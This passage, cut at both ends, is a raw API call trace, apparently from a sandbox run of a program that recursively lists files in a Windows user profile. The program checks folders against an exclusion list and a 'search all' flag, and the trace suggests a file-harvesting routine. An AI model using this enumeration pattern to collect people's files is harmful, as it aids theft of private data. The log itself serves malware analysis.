nFileSizeHigh=0x0, nFileSizeLow=0xb9d1, dwReserved0=0x10, dwReserved1=0x657690, cFileName="8tJ3GTLOl3FHI5E.jpg", cAlternateFileName="8TJ3GT~1.JPG")) returned 1 [0074.612] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8ea490, ftCreationTime.dwHighDateTime=0x1d5da3a, ftLastAccessTime.dwLowDateTime=0xb4730110, ftLastAccessTime.dwHighDateTime=0x1d5e3b1, ftLastWriteTime.dwLowDateTime=0xb4730110, ftLastWriteTime.dwHighDateTime=0x1d5e3b1, nFileSizeHigh=0x0, nFileSizeLow=0x8f3a, dwReserved0=0x10, dwReserved1=0x657690, cFileName="CNlXKQK1zNg.bmp", cAlternateFileName="CNLXKQ~1.BMP")) returned 1 [0074.612] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05e48a0, ftCreationTime.dwHighDateTime=0x1d5dfa5, ftLastAccessTime.dwLowDateTime=0x283be5b0, ftLastAccessTime.dwHighDateTime=0x1d5dc0c, ftLastWriteTime.dwLowDateTime=0x283be5b0, ftLastWriteTime.dwHighDateTime=0x1d5dc0c, nFileSizeHigh=0x0, nFileSizeLow=0xa1fa, dwReserved0=0x10, dwReserved1=0x657690, cFileName="EVGfmjA.png", cAlternateFileName="")) returned 1 [0074.612] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b16250, ftCreationTime.dwHighDateTime=0x1d5dbf8, ftLastAccessTime.dwLowDateTime=0xb6ccdc90, ftLastAccessTime.dwHighDateTime=0x1d5e322, ftLastWriteTime.dwLowDateTime=0xb6ccdc90, ftLastWriteTime.dwHighDateTime=0x1d5e322, nFileSizeHigh=0x0, nFileSizeLow=0x77e4, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Lu YE0Otm8F.gif", cAlternateFileName="LUYE0O~1.GIF")) returned 1 [0074.612] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f47ce0, ftCreationTime.dwHighDateTime=0x1d5d9c2, ftLastAccessTime.dwLowDateTime=0xe8598c0, ftLastAccessTime.dwHighDateTime=0x1d5e321, ftLastWriteTime.dwLowDateTime=0xe8598c0, ftLastWriteTime.dwHighDateTime=0x1d5e321, nFileSizeHigh=0x0, nFileSizeLow=0xa5d9, dwReserved0=0x10, dwReserved1=0x657690, cFileName="P8P2Fux.gif", cAlternateFileName="")) returned 1 [0074.613] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef78b20, ftCreationTime.dwHighDateTime=0x1d5e1b2, ftLastAccessTime.dwLowDateTime=0x13eacf50, ftLastAccessTime.dwHighDateTime=0x1d5e31d, ftLastWriteTime.dwLowDateTime=0x13eacf50, ftLastWriteTime.dwHighDateTime=0x1d5e31d, nFileSizeHigh=0x0, nFileSizeLow=0xb4e0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Pw6nPSJwo.png", cAlternateFileName="PW6NPS~1.PNG")) returned 1 [0074.613] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac9aec00, ftCreationTime.dwHighDateTime=0x1d5dea2, ftLastAccessTime.dwLowDateTime=0x35a7ad10, ftLastAccessTime.dwHighDateTime=0x1d5e585, ftLastWriteTime.dwLowDateTime=0x35a7ad10, ftLastWriteTime.dwHighDateTime=0x1d5e585, nFileSizeHigh=0x0, nFileSizeLow=0x18b97, dwReserved0=0x10, dwReserved1=0x657690, cFileName="qiez.png", cAlternateFileName="")) returned 1 [0074.613] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525098e0, ftCreationTime.dwHighDateTime=0x1d5dd7a, ftLastAccessTime.dwLowDateTime=0xf1e50b30, ftLastAccessTime.dwHighDateTime=0x1d5df13, ftLastWriteTime.dwLowDateTime=0xf1e50b30, ftLastWriteTime.dwHighDateTime=0x1d5df13, nFileSizeHigh=0x0, nFileSizeLow=0x176ff, dwReserved0=0x10, dwReserved1=0x657690, cFileName="QS5wBgJkU5.bmp", cAlternateFileName="QS5WBG~1.BMP")) returned 1 [0074.613] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a73a50, ftCreationTime.dwHighDateTime=0x1d5e3c6, ftLastAccessTime.dwLowDateTime=0x11687980, ftLastAccessTime.dwHighDateTime=0x1d5dc33, ftLastWriteTime.dwLowDateTime=0x11687980, ftLastWriteTime.dwHighDateTime=0x1d5dc33, nFileSizeHigh=0x0, nFileSizeLow=0x26c2, dwReserved0=0x10, dwReserved1=0x657690, cFileName="rULw.png", cAlternateFileName="")) returned 1 [0074.613] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d69370, ftCreationTime.dwHighDateTime=0x1d5d92b, ftLastAccessTime.dwLowDateTime=0xa1f44280, ftLastAccessTime.dwHighDateTime=0x1d5e558, ftLastWriteTime.dwLowDateTime=0xa1f44280, ftLastWriteTime.dwHighDateTime=0x1d5e558, nFileSizeHigh=0x0, nFileSizeLow=0x4969, dwReserved0=0x10, dwReserved1=0x657690, cFileName="uPfzg.bmp", cAlternateFileName="")) returned 1 [0074.613] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9489db00, ftCreationTime.dwHighDateTime=0x1d5df5e, ftLastAccessTime.dwLowDateTime=0x82a6dc10, ftLastAccessTime.dwHighDateTime=0x1d5dc77, ftLastWriteTime.dwLowDateTime=0x82a6dc10, ftLastWriteTime.dwHighDateTime=0x1d5dc77, nFileSizeHigh=0x0, nFileSizeLow=0xa046, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="x6Gb.png", cAlternateFileName="")) returned 1 [0074.613] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x1580055, ftCreationTime.dwLowDateTime=0xc36a3, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x1440056, nFileSizeHigh=0xc36a3, nFileSizeLow=0x6bbff0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="x6\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.614] FindClose (in: hFindFile=0x6b8bb8 | out: hFindFile=0x6b8bb8) returned 1 [0074.614] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe51b8690, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x1a5beaa0, ftLastAccessTime.dwHighDateTime=0x1d5d9e4, ftLastWriteTime.dwLowDateTime=0x1a5beaa0, ftLastWriteTime.dwHighDateTime=0x1d5d9e4, nFileSizeHigh=0x0, nFileSizeLow=0xa27d, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="f2JFy_.jpg", cAlternateFileName="")) returned 1 [0074.614] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324b5d80, ftCreationTime.dwHighDateTime=0x1d5e326, ftLastAccessTime.dwLowDateTime=0x4c7f4730, ftLastAccessTime.dwHighDateTime=0x1d5df38, ftLastWriteTime.dwLowDateTime=0x4c7f4730, ftLastWriteTime.dwHighDateTime=0x1d5df38, nFileSizeHigh=0x0, nFileSizeLow=0x8697, dwReserved0=0x10, dwReserved1=0x657690, cFileName="QMJeO8.gif", cAlternateFileName="")) returned 1 [0074.614] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca756f0, ftCreationTime.dwHighDateTime=0x1d5e4b5, ftLastAccessTime.dwLowDateTime=0x4016bd20, ftLastAccessTime.dwHighDateTime=0x1d5dba0, ftLastWriteTime.dwLowDateTime=0x4016bd20, ftLastWriteTime.dwHighDateTime=0x1d5dba0, nFileSizeHigh=0x0, nFileSizeLow=0x1720a, dwReserved0=0x10, dwReserved1=0x657690, cFileName="rcuM7uLGY1kXH5mCjrE6.bmp", cAlternateFileName="RCUM7U~1.BMP")) returned 1 [0074.614] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60b46d40, ftCreationTime.dwHighDateTime=0x1d5de1e, ftLastAccessTime.dwLowDateTime=0x8e2aef50, ftLastAccessTime.dwHighDateTime=0x1d5e38d, ftLastWriteTime.dwLowDateTime=0x8e2aef50, ftLastWriteTime.dwHighDateTime=0x1d5e38d, nFileSizeHigh=0x0, nFileSizeLow=0x2cc4, dwReserved0=0x10, dwReserved1=0x657690, cFileName="tiM2iA.jpg", cAlternateFileName="")) returned 1 [0074.614] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ac7960, ftCreationTime.dwHighDateTime=0x1d5e3d1, ftLastAccessTime.dwLowDateTime=0x6fbebf20, ftLastAccessTime.dwHighDateTime=0x1d5dac2, ftLastWriteTime.dwLowDateTime=0x6fbebf20, ftLastWriteTime.dwHighDateTime=0x1d5dac2, nFileSizeHigh=0x0, nFileSizeLow=0x3ead, dwReserved0=0x10, dwReserved1=0x657690, cFileName="ufXfgc_LQhg.png", cAlternateFileName="UFXFGC~1.PNG")) returned 1 [0074.614] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x641db40, ftCreationTime.dwHighDateTime=0x1d5e120, ftLastAccessTime.dwLowDateTime=0x8da1e520, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0x8da1e520, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x542a, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="_jWe.png", cAlternateFileName="")) returned 1 [0074.615] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0xf60066, ftCreationTime.dwLowDateTime=0xc3709, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0xec0067, nFileSizeHigh=0xc3709, nFileSizeLow=0x6bbff0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="_j\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.615] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.615] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd54bd6e0, ftCreationTime.dwHighDateTime=0x1d5dc96, ftLastAccessTime.dwLowDateTime=0x4b84be50, ftLastAccessTime.dwHighDateTime=0x1d5d858, ftLastWriteTime.dwLowDateTime=0x4b84be50, ftLastWriteTime.dwHighDateTime=0x1d5d858, nFileSizeHigh=0x0, nFileSizeLow=0x158e9, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="ITYvcRMYOFcy 0-.png", cAlternateFileName="ITYVCR~1.PNG")) returned 1 [0074.615] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23400e00, ftCreationTime.dwHighDateTime=0x1d5e310, ftLastAccessTime.dwLowDateTime=0xe7155b40, ftLastAccessTime.dwHighDateTime=0x1d5e5dc, ftLastWriteTime.dwLowDateTime=0xe7155b40, ftLastWriteTime.dwHighDateTime=0x1d5e5dc, nFileSizeHigh=0x0, nFileSizeLow=0x103c4, dwReserved0=0x10, dwReserved1=0x657690, cFileName="oNhYsixG5vZ 1mhk2TaA.jpg", cAlternateFileName="ONHYSI~1.JPG")) returned 1 [0074.615] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17de1ac0, ftCreationTime.dwHighDateTime=0x1d5da23, ftLastAccessTime.dwLowDateTime=0x8f3abf20, ftLastAccessTime.dwHighDateTime=0x1d5e431, ftLastWriteTime.dwLowDateTime=0x8f3abf20, ftLastWriteTime.dwHighDateTime=0x1d5e431, nFileSizeHigh=0x0, nFileSizeLow=0x1270a, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="OV_bHLK.gif", cAlternateFileName="")) returned 1 [0074.615] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cfdcdb0, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0xf6dd40e0, ftLastAccessTime.dwHighDateTime=0x1d5e2b9, ftLastWriteTime.dwLowDateTime=0xf6dd40e0, ftLastWriteTime.dwHighDateTime=0x1d5e2b9, nFileSizeHigh=0x0, nFileSizeLow=0xc3db, dwReserved0=0x10, dwReserved1=0x657690, cFileName="qdzhTNRtUaAFIidK.bmp", cAlternateFileName="QDZHTN~1.BMP")) returned 1 [0074.615] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950c5350, ftCreationTime.dwHighDateTime=0x1d5de5f, ftLastAccessTime.dwLowDateTime=0xf3d6a560, ftLastAccessTime.dwHighDateTime=0x1d5e1ad, ftLastWriteTime.dwLowDateTime=0xf3d6a560, ftLastWriteTime.dwHighDateTime=0x1d5e1ad, nFileSizeHigh=0x0, nFileSizeLow=0x7498, dwReserved0=0x10, dwReserved1=0x657690, cFileName="xsLu.jpg", cAlternateFileName="")) returned 1 [0074.615] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3be77fc0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xf87ced70, ftLastAccessTime.dwHighDateTime=0x1d5e385, ftLastWriteTime.dwLowDateTime=0xf87ced70, ftLastWriteTime.dwHighDateTime=0x1d5e385, nFileSizeHigh=0x0, nFileSizeLow=0x11ae2, dwReserved0=0x10, dwReserved1=0x657690, cFileName="zvOG.jpg", cAlternateFileName="")) returned 1 [0074.615] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x1160077, ftCreationTime.dwLowDateTime=0xc376f, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x12c0078, nFileSizeHigh=0xc376f, nFileSizeLow=0x76a868, dwReserved0=0x10, dwReserved1=0x657690, cFileName="zv\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.615] FindClose (in: hFindFile=0x6b8a38 | out: hFindFile=0x6b8a38) returned 1 [0074.615] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0074.615] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PrintHood", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0074.615] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.615] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b348, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x86f028b, nFileSizeHigh=0xb8b48, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="", cAlternateFileName="?haဓ\x03\x10")) returned 0xffffffff [0074.616] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="Recent", cAlternateFileName="")) returned 1 [0074.616] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Recent", cchCount1=6, lpString2="AppData", cchCount2=7) returned 3 [0074.616] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.617] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b318, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x86f028b, nFileSizeHigh=0xb8b72, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="", cAlternateFileName="?haဓ\x03\x10")) returned 0xffffffff [0074.617] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x61e84c, dwReserved1=0x657690, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0074.617] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Saved Games", cchCount1=11, lpString2="AppData", cchCount2=7) returned 3 [0074.617] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.617] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8a38 [0074.617] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.617] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.617] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x11a0077, ftCreationTime.dwLowDateTime=0xc3820, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x1000078, nFileSizeHigh=0xc3820, nFileSizeLow=0x76b2a0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="햠ⴢ\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.618] FindClose (in: hFindFile=0x6b8a38 | out: hFindFile=0x6b8a38) returned 1 [0074.618] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="Searches", cAlternateFileName="")) returned 1 [0074.618] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Searches", cchCount1=8, lpString2="AppData", cchCount2=7) returned 3 [0074.618] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.618] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8a38 [0074.618] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.618] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.618] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0074.618] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0074.618] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x1000077, ftCreationTime.dwLowDateTime=0xc3883, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0xde0078, nFileSizeHigh=0xc3883, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="In\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.618] FindClose (in: hFindFile=0x6b8a38 | out: hFindFile=0x6b8a38) returned 1 [0074.618] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, 